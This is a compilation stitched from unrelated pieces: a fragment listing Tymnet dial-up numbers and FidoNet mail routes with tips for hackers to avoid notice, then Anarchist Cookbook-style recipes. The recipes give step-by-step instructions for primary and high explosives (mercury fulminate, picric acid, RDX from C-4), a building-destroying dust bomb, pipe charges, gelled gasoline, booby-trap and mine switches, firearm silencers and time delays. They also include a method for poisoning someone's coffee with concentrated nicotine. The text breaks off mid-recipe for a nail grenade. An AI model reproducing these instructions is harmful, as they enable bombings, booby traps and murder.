             WELCOME TO MICROLINK II
             -XXXX:01-030-
             PLEASE LOG IN:
             .T < _C _R _> _            (USERNAME TO ACCESS TYMNET)
 
 
             HOST: CALL CONNECTED
 
             -GWY 0XXXX- TYMNET: PLEASE LOG IN:
 
 
                             SOUTHERN NEW ENGLAND
 
NODE    CITY                  STATE           DENSITY  ACCESS NUMBERS NWRK
-----   -------------------   -----------     -------  -------------- -----
02727   BRIDGEPORT            CONNECTICUT     300/2400 203/366-6972   @CONNNET
02727   BRISTOL               CONNECTICUT     300/2400 203/589-5100   @CONNNET
02727   CANAAN                CONNECTICUT     300/2400 203/824-5103   @CONNNET
02727   CLINTON               CONNECTICUT     300/2400 203/669-4243   @CONNNET
02727   DANBURY               CONNECTICUT     300/2400 203/743-2906   @CONNNET
02727   DANIELSON             CONNECTICUT     300/2400 203/779-1880   @CONNNET
02727   HARTFORD/MIDDLETOWN   CONNECTICUT     300/2400 203/724-6219   @CONNNET
02727   MERIDEN               CONNECTICUT     300/2400 203/237-3460   @CONNNET
02727   NEW HAVEN             CONNECTICUT     300/2400 203/776-1142   @CONNNET
02727   NEW LONDON            CONNECTICUT     300/2400 203/443-0884   @CONNNET
02727   NEW MILFORD           CONNECTICUT     300/2400 203/355-0764   @CONNNET
02727   NORWALK               CONNECTICUT     300/2400 203/866-5305   @CONNNET
02727   OLD GREDDWICH         CONNNETICUT     300/2400 203/637-8872   @CONNNET
02727   OLD SAYBROOK          CONNECTICUT     300/2400 203/388-0778   @CONNNET
02727   SEYMOUR               CONNECTICUT     300/2400 203/881-1455   @CONNNET
02727   STAMFORD              CONNECTICUT     300/2400 203/324-9701   @CONNNET
02727   STORRS                CONNECTICUT     300/2400 203/429-4243   @CONNNET
02727   TORRINGTON            CONNECTICUT     300/2400 203/482-9849   @CONNNET
02727   WATERBURY             CONNECTICUT     300/2400 203/597-0064   @CONNNET
02727   WILLIMANTIC           CONNECTICUT     300/2400 203/456-4552   @CONNNET
02727   WINDSOR               CONNECTICUT     300/2400 203/688-9330   @CONNNET
02727   WINDSOR LCKS/ENFIELD  CONNECTICUT     300/2400 203/623-9804   @CONNNET
 
 
 
    @CONNNET - SOUTHERN NEW ENGLAND TELEPHONE - NETWORK NAME IN CONNNET
 
     (CONNECT MESSAGE)
 
      H_ H_ <_ C_ R_>        (SYNCHRONIZES DATA SPEEDS)
                        (DOES NOT ECHO TO THE TERMINAL)
      CONNNET
 
     ._ T_ <_ C_ R_>_         (MUST BE CAPITAL LETTERS)
 
      26-SEP-88   18:33          (DATA)
      031069                     (ADDRESS CONFIRMATION)
      COM                        (CONFIRMATION OF CALL SET-UP)
 
      -GWY OXXXX-TYMNET: PLEASE LOG IN:
 
On a side note, the recent book The Cuckoo's Egg provides some interesting
information (in the form of a story, however) on a Tymnet hacker.  Remember
that he was into BIG things, and hence he was cracked down upon.  If you keep a
low profile, networks should provide a good access method.
 
If you can find a system that is connected to the Internet that you can get on
from Tymnet, you are doing well.
_______________________________________________________________________________
 
Username@f<node #>.n<net #>.z<zone #>.ifna.org
 
In other words, if I wanted to mail to Silicon Swindler at 1:135/5, the address
would be Silicon_Swindler@f5.n135.z1.ifna.org and, provided that your mailer
knows the .ifna.org domain, it should get through alright.  Apparently, as of
the writing of this article, they have implemented a new gateway name called
fidonet.org which should work in place of ifna.org in all routings.  If your
mailer does not know either of these domains, use the above routing but replace
the first "@" with a "%" and then afterwards, use either of the following
mailers after the "@":  CS.ORST.EDU or K9.CS.ORST.EDU (i.e. username%f<node
#>.n<net #>.z<zone #>.fidonet.org@CS.ORST.EDU [or replace CS.ORST.EDU with
K9.CS.ORST.EDU]).
 
The following is a list compiled by Bill Fenner (WCF@PSUECL.BITNET) that was
posted on INFONETS DIGEST which lists a number of FIDONET gateways:
 
Net      Node    Node Name
~~~      ~~~~    ~~~~~~~~~
104      56      milehi.ifna.org
105      55      casper.ifna.org
107      320     rubbs.ifna.org
109      661     blkcat.ifna.org
125      406     fidogate.ifna.org
128      19      hipshk.ifna.org
129      65      insight.ifna.org
143      N/A     fidogate.ifna.org
152      200     castle.ifna.org
161      N/A     fidogate.ifna.org
369      17      megasys.ifna.org
 
NOTE:  The UUCP equivalent node name is the first part of the node name.  In
       other words, the UUCP node milehi is listed as milehi.ifna.org but can
       be mailed directly over the UUCP network.
 
Another way to mail to FIDONET, specifically for Internet people, is in this
format:
 
ihnp4!necntc!ncoast!ohiont!<net #>!<node #>!user_name@husc6.harvard.edu
 
And for those UUCP mailing people out there, just use the path described and
ignore the @husc5.harvard.edu portion. There is a FIDONET NODELIST available on
most any FIDONET bulletin board, but it is quite large.
 
ONTYME
~~~~~~
Previously known as Tymnet, OnTyme is the McDonnell Douglas revision.  After
they bought out Tymnet, they renamed the company and opened an experimental
Internet gateway at ONTYME.TYMNET.COM but this is supposedly only good for
certain corporate addresses within McDonnell Douglas and Tymnet, not their
customers.  The userid format is xx.yyy or xx.y/yy where xx is a net name and
yyy (or y/yy) is a true username.  If you cannot directly nail this, try:
 
xx.yyy%ONTYME.TYM

ExodusSodium Chlorate                                by the Jolly Roger

     Sodium Chlorate is a strong oxidizer used in the manufacture of 
explosives. It can be used in place of Potassium Chlorate.

Material Required                            Sources
-----------------                            -------

2 carbon or lead rods (1 in. diameter        Dry Cell Batteries
by 5 in. long)                               (2-1/2 in. diameter by
                                             7" long) or plumbing
                                             supply store
Salt, or ocean water                         Grocery store or ocean
Sulfuric acid, diluted                       Motor Vehicle Batteries
Motor Vehicle
Water
2 wires, 16 gauge (3/64 in. diameter approx.), 6 ft. long, insulated.
Gasoline
1 gallon glass jar, wide mouth (5 in. diameter by 6 in. high approx.)
Sticks
String
Teaspoon
Trays
Cup
Heavy cloth
Knife
Large flat pan or tray        

Procedure
---------

1) Mix 1/2 cup of salt into the one gallon glass jar with 3 litres (3 
quarts) of water.
2) Add 2 teaspoons of battery acid to the solution and stir vigorously 
for 5 minutes.
3) Strip about 4 inches of insulation from both ends of the two wires.
4) With knife and sticks, shape 2 strips of wood 1 by 1/8 by 1-1/2. Tie 
the wood strips to the lead or carbon rods so that they are 1-1/2 incles 
apart.
5) Connect the rods to the battery in a motor vehicle with the insulated 
wire.
6) Submerge 4-1/2 inches of the rods in the salt water solution.
7) With gear in neutral position, start the vehicle engine. Depress the 
accelerator approx. 1/5 of its full travel.
8) Run the engine with the accelerator in this position for 2 hours, then 
shut it down for 2 hours.
9) Repeat this cycle for a total of 64 hours while maintaining the level 
of the acid-salt water solution in the glass jar.

CAUTION: This arrangement employs voltages which can be quite dangerous! 
Do not touch bare wire leads while engine is running!!

10) Shut off the engine. Remove the rods from the glass jar and 
disconnect wire leads from the battery.
11) Filter the solution through the heavy cloth into a flat pan or tray, 
leaving the sediment at the bottom of the glass jar.
12) Allow the water in the filtered solution to evaporate at room 
temperature (approx. 16 hours). The residue is approximately 60% or more 
sodium chlorate which is pure enough to be used as an explosive 
ingredient.

                         -------Exodus------  CBIV, '94





  MERCURY FULMINATE 2                           - Exodus -

     Mercury fulminate is perhaps one of the oldest known initiating
compounds. It can be detonated by either heat or shock, which would make it of
infinite value to a terrorist.  Even the action of dropping a crystal of the
fulminate causes it to explode.  A person making this material would probably
use the following procedure:

     MATERIALS                  EQUIPMENT
     ÄÄÄÄÄÄÄÄÄ                  ÄÄÄÄÄÄÄÄÄ
     5 g mercury               glass stirring rod

     35 ml concentrated         100 ml beaker (2)
     nitric acid

     ethyl alcohol (30 ml)      adjustable heat source

     distilled water            blue litmus paper

                                funnel and filter paper

     Solvent alcohol must be at least 95% ethyl alcohol if it is used to make
mercury fulminate. Methyl alcohol may prevent mercury fulminate from forming.

     Mercury thermometers are becoming a rarity, unfortunately.  They may be
hard to find in most stores as they have been superseded by alcohol and other
less toxic fillings. Mercury is also used in mercury switches, which are
available at electronics stores. Mercury is a hazardous substance, and should
be kept in the thermometer or mercury switch until used. It gives off mercury
vapors which will cause brain damage if inhaled.  For this reason, it is a
good idea not to spill mercury, and to always use it outdoors. Also, do not
get it in an open cut; rubber gloves will help prevent this.

1) In one beaker, mix 5 g of mercury with 35 ml of concentrated nitric acid,
   using the glass rod.

2) Slowly heat the mixture until the mercury is dissolved, which is when the
   solution turns green and boils.

3) Place 30 ml of ethyl alcohol into the second beaker, and slowly and
   carefully add all of the contents of the first beaker to it.  Red and/or
   brown fumes should appear. These fumes are toxic and flammable.

4) After thirty to forty minutes, the fumes should turn white, indicating that
   the reaction is near completion.  After ten more minutes, add 30 ml of the
   distilled water to the solution.

5) Carefully filter out the crystals of mercury fulminate from the liquid
   solution.  Dispose of the solution in a safe place, as it is corrosive and
   toxic.

6) Wash the crystals several times in distilled water to remove as much excess
   acid as possible.  Test the crystals with the litmus paper until they are
   neutral.   This will be when the litmus paper stays blue when it touches
   the wet crystals

7) Allow the crystals to dry, and store them in a safe place, far away from
   any explosive or flammable material.

       This procedure can also be done by volume, if the available mercury
cannot be weighed.  Simply use 10 volumes of nitric acid and 10 volumes of
ethanol to every one volume of mercury.

Improvised Black Powder                             by the Jolly Roger

     Black powder can be prepared in a simple, safe manner. It may be used as 
blasting or gun powder.

Material Required
-----------------

Potassium Nitrate, granulated, 3 cups (3/4 liter)
Wood charcoal, powdered, 2 cups
Sulfur, powdered, 1/2 cup
Alcohol, 5 pints (2-1/2 liters) (whiskey, rubbing alcohol, etc.)
Water, 3 cups (3/4 liter)
Heat source
2 buckets - each 2 gallon (7-1/2 litres) capacity, at least one of which is 
     heat resistant (metal, ceramic, etc.)
Flat window screening, at least 1 foot (30 cm) square
Large wooden stick
Cloth, at leat 2 feet (60 cm) square

Procedure:
---------

1) Place alcohol in one of the buckets.
2) Place potassium nitrate, charcoal, and sulfur in the heat resistant 
bucket. Add 1 cup water and mix thoroughly with wooden stick until all 
ingrediants are dissolved.
3) Add remaining water (2 cups) to mixture. Place bucket on heat source and 
stir until small bubbles begin to form.

CAUTION: DO NOT boil mixture. Be sure ALL mixture stays wet. If any is dry, 
as on sides of pan, it may ignite!

4) Remove bucket from heat and pour mixture into alcohol while stirring 
vigorously.
5) Let alcohol mixture stand about 5 minutes. Strain mixture through cloth to 
obtain black powder. Discard liquid. Wrap cloth around black powder and 
squeeze to remove all excess liquid.
6) Place screening over dry bucket. Place workable amount of damp powder on 
screen and granulate by rubbing solid through screen. NOTE: If granulated 
particles appear to stick together and change shape, recombine entire batch 
of powder and repeat steps 5 & 6.
7) Spread granulated black powder on flat, dry surface so that layer about 
1/2 inch (1-1/4 cm) is formed. Allow to dry. Use radiator, or direct 
sunlight. This should be dried as soon as possible, preferably in an hour. 
The longer the drying period, the less effective the black powder.

CAUTION: Remove from heat AS SOON AS granules are dry. Black powder isnow 
ready to use.


Used in CBIV, '94                     -= Exodus =-    NITRIC ACID                               -= Exodus =-  '94

       There are several ways to make this most essential of all acids for  
explosives. One method by which it could be made will be presented. Once  
again, be reminded that these methods SHOULD NOT BE CARRIED OUT!!

     Materials:                             Equipment:
     ÄÄÄÄÄÄÄÄÄ                              ÄÄÄÄÄÄÄÄÄ
     sodium nitrate or                      adjustable heat source     
     potassium nitrate
                                            retort
     distilled water
                                            ice bath
     concentrated
     sulfuric acid                          stirring rod

                                            collecting flask with stopper

1) Pour 32 milliliters of concentrated sulfuric acid into the retort.

2) Carefully weigh out 58 grams of sodium nitrate, or 68 grams of potassium
nitrate. and add this to the acid slowly.  If it all does not dissolve,
carefully stir the solution with a glass rod until it does.

3) Place the open end of the retort into the collecting flask, and place the   
collecting flask in the ice bath.

4) Begin heating the retort, using low heat.  Continue heating until liquid
begins to come out of the end of the retort.  The liquid that forms is nitric
acid.  Heat until the precipitate in the bottom of the retort is almost dry,
or until no more nitric acid is forming.  CAUTION: If the acid is headed too
strongly, the nitric acid will decompose as soon as it is formed.  This can
result in the production of highly flammable and toxic gasses that may
explode.  It is a good idea to set the above apparatus up, and then get away
from it.

     Potassium nitrate could also be obtained from store-bought black powder,
simply by dissolving black powder in boiling water and filtering out the sulfur
and charcoal. To obtain 68 g of potassium nitrate, it would be necessary to
dissolve about 90 g of black powder in about one litre of boiling water. Filter
the dissolved solution through filter paper in a funnel into a jar until the
liquid that pours through is clear. The charcoal and sulfur in black powder are
insoluble in water, and so when the solution of water is allowed to evaporate,
potassium nitrate will be left in the jar.

Dust Bomb Instructions                               by the Jolly Roger

     An initiator which will initiate common material to produce dust 
explosions can be rapidly and easily constructed. This type of charge is 
ideal for the destruction of enclosed areas such as rooms or buildings.

Material Required
-----------------
A flat can, 3 in. (8 cm) in diameter and 1-1/2 in. (3-3/4 cm) high. A 6-
     1/2 ounce tuna can serves the purpose quite well.
Blasting cap
Explosive
Aluminum (may be wire, cut sheet, flattened can, or powder)
Large nail, 4 in. (10 cm) long
Wooden rod - 1/4 in. (6 mm) diameter
Flour, gasoline, and powder or chipped aluminum

NOTE: Plastic explosive produce better explosions than cast explosives.

Procedure:
---------

1) Using the nail, press a hole through the side of the tuna can 3/8 inch 
to 1/2 inch (1 to 1-1/2 cm) from the bottom. Using a rotating and lever 
action, enlarge the hole until it will accomodate the blasting cap.
2) Place the wooden rod in the hole and position the end of the rod at the 
center of the can.
3) Press explosive into the can, being sure to surround the rod, until it 
is 3/4 inch (2 cm) from the top of the can. Carefully remove the wooden 
rod.
4) Place the aluminum metal on top of the explosive.
5) Just before use, insert the blasting cap into the cavity made by the 
rod. The initiator is now ready to use.

NOTE: If it is desired to carry the initiator some distance, cardboard may 
be pressed on top of the aluminum to insure against loss of material.

How to Use:
----------

     This particular unit works quite well to initiate charges of five 
pounds of flour, 1/2 gallon (1-2/3 litres) of gasoline, or two pounds of 
flake painters aluminum. The solid materials may merely be contained in 
sacks or cardboard cartons. The gasoline may be placed in plastic coated 
paper milk cartons, as well as plastic or glass bottles. The charges are 
placed directly on top of the initiator and the blasting cap is actuated 
electrically or by a fuse depending on the type of cap employed. this will 
destroy a 2,000 cubic feet enclosure (building 10 x 20 x 10 feet).

Note: For larger enclosures, use proportionally larger initiators and 
charges.

CBIV, '94, -= Exodus =-
Carbon-Tet Explosive                            by the Jolly Roger

     A moist explosive mixture can be made from fine aluminum powder combined 
with carbon tetrachloride or tetrachloroethylene. This explosive can be 
detonated with a blasting cap.

Material Required                                 Source
-----------------                                 ------
Fine aluminum bronzing powder                     Paint store
Carbon Tetrachloride                              Pharmacy, or fire
         or                                       extinguisher fluid
tetrachloroethylene                               Dry cleaners, pharmacy
Stirring rod (wood)
Mixing container (bowl, bucket, etc.)
Measuring container (cup, tablespoon, etc.)
Storage container (jar, can, etc.)
Blasting cap
Pipe, can or jar

Procedure:
---------

1) Measure out two parts aluminum powder to one part carbon tetrachloride or 
tetrachlorethylene liquid into mixing container, adding liquid to powder 
while stirring with the wooden rod.
2) Stir until the mixture becomes the consistency of honey syrup.

CAUTION: Fumes from the liquid are dangerous and should not be inhaled.

3) Store explosive in a jar or similar water proof container until ready to 
use. The liquid in the mixture evaporates quicky when not confined.

NOTE: Mixture will detonate in this manner for a period of 72 hours.

How to Use:
----------

1) Pour this mixture into an iron or steel pipe which has an end cap threaded 
on one end. If a pipe is not available, you may use a dry tin can or glass 
jar.
2) Insert blasting cap just beneath the surface of the explosive mix.

NOTE: Confining the open end of the container will add to the effectiveness 
of the explosive.

                                Compiled by: ExodusMaking Picric Acid from Aspirin                         by the Jolly Roger

     Picric Acid can be used as a booster explosive in detonators, a high 
explosive charge, or as an intermediate to preparing lead picrate.

Material Required
-----------------
Aspirin tablets (5 grains per tablet)
Alcohol, 95% pure
Sulfuric acid, concentrated, (if battery acid, boil until white fumes 
     disappear)
Potassium Nitrate (see elsewhere in this Cookbook)
Water
Paper towels
Canning jar, 1 pint
Rod (glass or wood)
Glass containers
Ceramic or glass dish
Cup
Teaspoon
Tablespoon
Pan
Heat source
Tape

Procedure:
---------

1) Crush 20 aspirin tablets in a glass container. Add 1 teaspoon of water 
and work into a paste.
2) Add approximately 1/3 to 1/2 cup of alcohol (100 millilitres) to the 
aspirin paste; stir while pouring.
3) Filter the alcohol-aspirin solution through a paper towel into another 
glass container. Discard the solid left in the paper towel.
4) Pour the filtered solution into a glass or ceramic dish.
5) Evaporate the alcohol and water from the solution by placing the dish 
into a pan of hot water. White powder will remain in the dish after 
evaporation.

NOTE: The water in the pan should be at hot bath temperature, not boiling, 
approx. 160 to 180 degress farenheit. It should not burn the hands.

6) Pour 1/3 cup (80 millilitres) of concentrated sulfuric acid into a 
canning jar. Add the white powder to the sulfuric acid.
7) Heat canning jar of sulfuric acid in a pan of simmering hot water bath 
for 15 minutes; then remove jar from the bath. Solution will turn to a 
yellow-orange color.
8) Add 3 level teaspoons (15 grams) of potassium nitrate in three portions 
to the yellow-orange solution; stir vigorously during additions. Solution 
will turn red, then back to a yellow-orange color.
9) Allow the solution to cool to ambient room temperature while stirring 
occasionally.
10) Slowly pour the solution, while stirring, into 1-1/4 cup (300 
millilitres) of cold water and allow to cool.
11) Filter the solution through a paper towel into a glass container. Light 
yellow particles will collect on the paper towel.
12) Wash the light yellow particles with 2 tablespoons (25 millilitres) of 
water. Discard the waste liquid in the container.
13) Place articles in ceramic dish and set in a hot water bath, as in step 
5, for 2 hours.

                                    Compiled by: ExodusReclamation of RDX from C-4 Explosives            by the Jolly Roger

     RDX can be obtained from C-4 explosives with the use of gasoline. It can 
be used as a booster explosive for detonators or as a high explosive charge.

Material Required
-----------------
Gasoline
C-4 explosive
2 - pint glass jars, wide mouth
Paper towels
Stirring rod (glass or wood)
Water
Ceramic or glass dish
Pan
Heat source
Teaspoon
Cup
Tape

NOTE: Water, Ceramic or glass dish, pan, & heat source are all optional. The 
RDX can be air dried instead.

Procedure:
---------

1) Place 1-1/2 teaspoons (15 grams) of C-4 explosive in one of the pint jars. 
Add 1 cup (240 milliliters) of gasoline.

NOTE: These quantities can be increased to obtain more RDX. For example, use 2 
gallons of gasoline per 1 cup of C-4.

2) Knead and stir the C-4 with the rod until the C-4 has broken down into small 
particles. Allow mixture to stand for 1/2 hour.
3) Stir the mixture again until a fine white powder remains on the bottom of 
the jar.
4) Filter the mixture through a paper towel into the other glass jar. Wash the 
particles collected on the paper towel with 1/2 cup (120 milliliters) of 
gasoline. Discard the waste liquid.
5) Place the RDX particles in a glass or ceramic dish. Set the dish in a pan of 
hot water, not boiling and dry for a period of 1 hour.

NOTE: The RDX particles may be air dried for a period of 2 to 3 hours.
See later file...... CBIV.               -= Exodus =-Egg-based Gelled Flame Fuels                          by the Jolly Roger

     The white of any bird egg can be used to gel gasoline for use as a 
flame fuel which will adhere to target surfaces.

Materials Required
------------------

Parts by
Volume               Ingredient              How used        Common Source
--------             ----------              --------        -------------

85                   Gasoline                Motor Fuel      Gas Stations
                                             Stove Fuel      Motor Vehicle
                                             Solvent

14                   Egg Whites              Food            Food Store
                                             Industrial      Farms
                                               Processes

Any one of the following:

1                    Table Salt              Food            Sea Water
                                             Industrial      Natural Brine
                                               Processes     Food Store

3                    Ground Coffee           Food            Coffee Plant
                                                             Food Store

3                    Dried Tea Leaves        Food            Tea Plant
                                                             Food Store

3                    Cocoa                   Food            Cacao Tree
                                                             Food Store

2                    Sugar                   Sweetening      Sugar Cane
                                               foods         Food Store

1                    Saltpeter               Pyrotechnics    Natural
                     (Potassium              Explosives        Deposits
                     Nitrate)                Matches         Drug Store
                                             Medicine

1                    Epsom Salts             Medicine        Natural
                                             Mineral Water   Kisserite
                                             Industrial      Drug Store
                                               Processes     Food Store

2                    Washing Soda            Washing Cleaner Food Store
                     (Sal Soda)              Medicine        Drug Store
                                             Photography     Photo Supply
                                                               Store

1 1/2                Baking Soda             Baking          Food Store
                                             Manufacturing   Drug Store
                                             of: Beverages
                                                 Medicines
                                                    and
                                                 Mineral
                                                   Waters

1 1/2                Aspirin                 Medicine        Drug Store
                                                             Food Store

Procedure:
---------

CAUTION: Make sure that ther are no open flames in the area when mixing 
flame fuels! NO SMOKING!!

1) Seperate the egg white from the yolk. This can be done by breaking the 
egg into a dish and carefully removing the yolk with a spoon.
2) Pour egg white into a jar, bottle, or other container, and add gasoline.
3) Add the salt (or other additive) to the mixture and stir occasionally 
until gel forms (about 5 to 10 minutes).

NOTE: A thicker gelled flame fuel can be obtained by putting the capped jar 
in hot (65 degrees Centegrade) water for about 1/2 hour and then letting 
them cool to room temperature. (DO NOT HEAT THE GELLED FUEL CONTAINING 
COFFEE!!)

Courtesy of CBIV, '94.                     -= Exodus =-Clothespin Switch                           by the Jolly Roger

     A spring type clothespin is used to make a circuit closing switch to 
actuate explosive charges, mines, booby traps, and alarm systems.

Material Required:
-----------------

Spring type clothespin
Sold copper wire -- 1/16 in. (2 mm) in diameter
Strong string on wire
Flat piece of wood (roughly 1/8 x 1" x 2")
Knife

Procedure:
---------

1) Strip four in. (10 cm) of insulation from the ends of 2 solid copper 
wires. Scrape the copper wires with pocket knife until the metal is 
shiny.
2) Wind one scraped wire tightly on jaw of the clothespin, and the other 
wire on the other jaw.
3) Make a hole in one end of the flat piece of wood using a knife, heated 
nail or drill.
4) Tie strong string or wire through the hole.
5) Place flat piece of wood between the jaws of the clothespin switch.

Basic Firing Circuit:
--------------------

        ______________
       |              |---------------------------\
       |  initiator   |----------\                |      strong
        --------------           |                |      twine
                                 |                |          \
                                 |               _---------_________
                                 |                ---------
                                 |                 |      \clothespin                                 \                /
                                  \              /         switch
                                   \            /
                                    \          /
                                     \        /
                                      +      -
                                     ----------
                                     |        |
                                     | battery|
                                     ----------

     When the flat piece of wood is removed by pulling the string, the 
jaws of the clothespin will close, completing the circuit.

CAUTION: Do not attach the battery until the switch and trip wire have 
been emplaced and examined. Be sure that the flat piece of wood is 
seperating the jaws of the switch.

Revised '94.   -= Exodus =-Flexible Plate Switch                             by the Jolly Roger

     This flexible plate switch is used for initiating emplaced mines and 
explosives.

Material Required:
-----------------

Two flexible metal sheets
  one approximately 10 in. (25 cm) square
  one approximately 10 in. x 8 in. (20 cm)
Piece of wood 10 in. square x 1 in. thick
Four soft wood blocks 1 in. x 1 in. x 1/4 in.
Eight flat head nails, 1 in. long
Connecting wires
Adhesive tape

Procedure:
---------

1) Nail 10 in. by 8 in. metal sheet to 10 in. square piece of wood so that 
1 in. of wood shows on each side of the metal. Leave one of the nails 
sticking up about 1/4 in.
2) Strip insulation from the end of one connecting wire. Wrap this end 
around the nail and drive the nail all the way in.
3) Place the four wood blocks on the corners of the wood base.
4) Place the 10 in. square flexible metal sheet so that it rests on the 
blocks in line with the wood base.
5) Drive four nails through the metal sheet and the blocks (1 per block) 
to fasten the sheet to the wood base. A second connecting wire is atached 
to one of the nails as in step #2.
6) Wrap the adhesive tape around the edges of the plate and wood base. 
This will assure that no dirt or other foreign matter will get between the 
plates and prevent the switch from operating.

How to use:
----------

The switch is placed in a hole in the path of expected traffic and covered 
with a thin layer of dirt or other camouflaging material. The mine or 
other explosive device connected to the switch can be buried with the 
switch or emplaced elsewhere as desired.

When a vehicle passes over the switch, the two metal plates make contact 
closing the firing circuit.

Revised, '94.       ExodusLow Signature Systems (Silencers)                  by the Jolly Roger

     Low signature systems (silencers) for improvised small arms weapons 
can be made from steel gas or water pipe and fittings.

Material Required:
-----------------
Grenade Container
Steel pipe nipple, 6 in. (15 cm) long - (see table 1 for diameter)
2 steel pipe couplings - (see table 2 for dimensions)
Cotton cloth - (see table 2)
Drill
Absorbent cotton

Procedure:
---------
1) Drill hole in grenade container at both ends to fit outside diameter 
of pipe nipple. (see table 1)

                 ->    /----------------------\
                /     |                        |
        2.75 in |      )                      ( <-holes
         dia.   \     |                        |
                 ->   \-----------------------/
                      
                      |-----------------------|
                               5 in.

2) Drill four rows of holes in pipe nipple. Use table 1 for diameter and 
location of holes.

                      (Note: I suck at ASCII art!)
                             
                                6 in.
                |-----------------------------------|
                _____________________________________ ___
                | O O O O O O O O O O O O O O O O O |  | C (nom. dia.)
                -------------------------------------
         (size of hole)   |                   \ / (space between)
                          B (dia.)             A


3) Thread one of the pipe couplings on the drilled pipe nipple.
4) Cut coupling length to allow barrel of weapon to thread fully into low 
signature system. Barrel should butt against end of the drilled pipe 
nipple.
5) Seperate the top half of the grenade container from the bottom half.
6) Insert the pipe nipple in the drilled hole at the base of the bottom 
half of the container. Pack theabsorbent cotton inside the container and 
around the pipe nipple.
7) Pack the absorbent cotton in top half of grenade container leaving 
hole in center. Assemble container to the bottom half.
8) Thread the other coupling onto the pipe nipple.

Note: A longer container and pipe nipple, with same "A" and "B" 
dimensions as those given, will furthur reduce the signature of the 
system.

How to use:
----------

1) Thread the low signature system on the selected weapon securely.
2) Place the proper cotton wad size into the muzzle end of the system 
(see table 2)
3) Load weapon
4) Weapon is now ready for use

TABLE 1 -- Low Signature System Dimensions
------------------------------------------

                                        (Coupling)  Holes per   (4 rows)
               A         B         C         D         Row        Total
------------------------------------------------------------------------
.45 cal        3/8       1/4       3/8       3/8       12           48

.38 cal        3/8       1/4       1/4       1/4       12           48

  9 mm         3/8       1/4       1/4       1/4       12           48

7.62 mm        3/8       1/4       1/4       1/4       12           48

.22 cal        1/4       5/32      1/8*      1/8       14           50
------------------------------------------------------------------------
           *Extra Heavy Pipe
       (All dimensions in inches)


TABLE 2 -- Cotton Wadding - Sizes
---------------------------------

-------------------------------------------------
Weapon                        Cotton Wadding Size
-------------------------------------------------
.45 cal                       1-1/2 x 6 inches

.38 cal                       1 x 4 inches
     
  9 mm                        1 x 4 inches

7.62 mm                       1 x 4 inches

.22 cal                       Not needed
-------------------------------------------------

                                         -=Exodus=-IMPROVED CIGARETTE DELAY                (By Atur {THE pyromaniac })


     A variation on the standard cigarette display was invented by my good
friend Atur (THE Pyromaniac). Rather than inserting the fuse into the SIDE
of the cigarette (and risk splitting it) half of the filter is cut off, and a
small hole is punched THROUGH the remainder of the filter and into the
tobacco.

(Ill. 4.31.1)

     ---------------------------------
     |FIL|Tobacco   Tobacco    Tobacco   
 fusefusefusefuse   Tobacco    Tobacco    side view
     |TER|Tobacco   Tobacco    Tobacco
     ---------------------------------
         ___
        /   \
        | o |    filter end view
        \___/                                (artwork by The Author)


     The fuse is inserted as far as possible into this hole, then taped or
glued in place, or the cigarette can be cut and punched ahead of time and
lit normally, then attached to the fuse at the scene.

     A similar type of device can be make from powdered charcoal and a sheet
of paper.  Simply roll the sheet of paper into a thin tube, and fill it with
powdered charcoal. Punch a hole in it at the desired location, and insert a
fuse. Both ends must be glued closed, and one end of the delay must be doused
with lighter fluid before it is lit. Or, a small charge of gunpowder mixed
with powdered charcoal could conceivably used for igniting such a delay. A
chain of charcoal briquettes can be used as a delay by merely lining up a few
bricks of charcoal so that they touch each other, end on end, and lighting the
first brick. Incense, which can be purchased at almost any novelty or party
supply store, can also be used as a fairly reliable delay. By wrapping the
fuse about the end of an incense stick, delays of up to 1/2 an hour are
possible.
     
          Fer the '94 CookBook.                        -= Exodus =-
Nicotine                                      by the Jolly Roger

     Nicotine is an abundant poison. Easily found in tobacco 
products, in concentrated form a few drops can quickly kill 
someone. Here is how to concentrate it:

     First get a can of chewing tobacco or pipe tobacco. Remove 
the contents and soak in water overnight in a jar (about 2/3 cup 
of water will do...). In the morning, strain into another jar the 
mixture through a porous towel. Then wrap the towel around the 
ball of tobacco and squeeze it until all of the liquid is in the 
jar. Throw away the tobacco--you will not need it anymore.

     Now you have two options. I recommend the first. It makes the 
nicotine more potent.
     1) Allow to evaporate until a sticky syrup results in the 
jar. This is almost pure nicotine (hell, it is pure enough for 
sure!). 
     2) Heat over low flame until water is evaporated and a thick 
sticky syrup results (I don't know how long it takes... shouldn't 
take too long, though.).

     Now all you have to do, when you wish to use it, is to put 
a few drops in a medicine dropper or equivalent, and slip about 4 
or 5 drops into the victim's coffee. Coffee is recommended since it 
will disguise the taste. Since nicotine is a drug, the victim 
should get quite a buzz before they turn their toes up to the 
daisies, so to speak.

     Note: If the syrup is too sticky, dilute it with a few drops 
of water. And while you are at it, better add an extra drop to the 
coffee just to be sure!

 Revised in '94,,.....   -= Exodus =-Dried Seed Timer                                    by the Jolly Roger

     A time delay device for electrical firing circuits can be made using 
the principle of expansion of dried seeds.

Material Required:
-----------------

Dried peas, beans, or oter dehydrated seeds
Wide-mouth glass jar with non-metal cap
Two screws or bolts
Thin metal plate
Hand drill
Screwdriver

Procedure:
---------
1) Determine the rate of the rise of the dried seeds selected. This is 
necessary to determine the delay time of the timer.
     a) Place a sample of the dried seeds in the jar and cover with 
        water.
     b) Measure the time it takes for the seeds to rise a given height. 
        Most dried seeds increase 50% in one to two hours.
2) Cut a disc from thin metal plate. Disc should fit loosely inside the 
jar.

NOTE: If metal is painted, rusty, or otherwise coated, it must be scraped 
or sanded to obtain a clean metal surface

3) Drill two holes in the cap of the jar about 2 inches apart. Diameter 
of holes should be such that screws or bolts will thread tightly into 
them. If the jar has a metal cap or no cap, a piece of wood or plastic 
(NOT METAL) can be used as a cover.
4) Turn the two screws or bolts through the holes in the cap. Bolts 
should extend about one in. (2 1/2 cm) into the jar.

IMPORTANT: Both bolts must extend the same distance below the container 
cover.

5) Pour dried seeds into the container. The level will depend upon the 
previously measured rise time and the desired delay.
6) Place the metal disc in the jar on top of the seeds.

How to use:
----------

1) Add just enough water to completely cover the seeds and place the cap 
on the jar.
2) Attach connecting wires from the firing circuit to the two screws on 
the cap.

Expansion of the seeds will raise the metal disc until it contacts the 
screws and closes the circuit.

                ------Exodus-----



Nail Grenade                                       by the Jolly Roger

     Effective fragmentation grenades can be made from a block of tnt or 
other blasting explosive and nails.

Material Required:
-----------------

Block of TNT or other blasting explosive
Nails
Non-electric (military or improvised) blasting cap
Fuse Cord
Tape, string, wire, or glue

Procedure:
---------

1) If an explosive charge other than a standard TNT block is used, make a 
hole in the center of the charge for inserting the blasting cap. TNT can 
be drilled with relative safety. With plastic explosives, a hole can be 
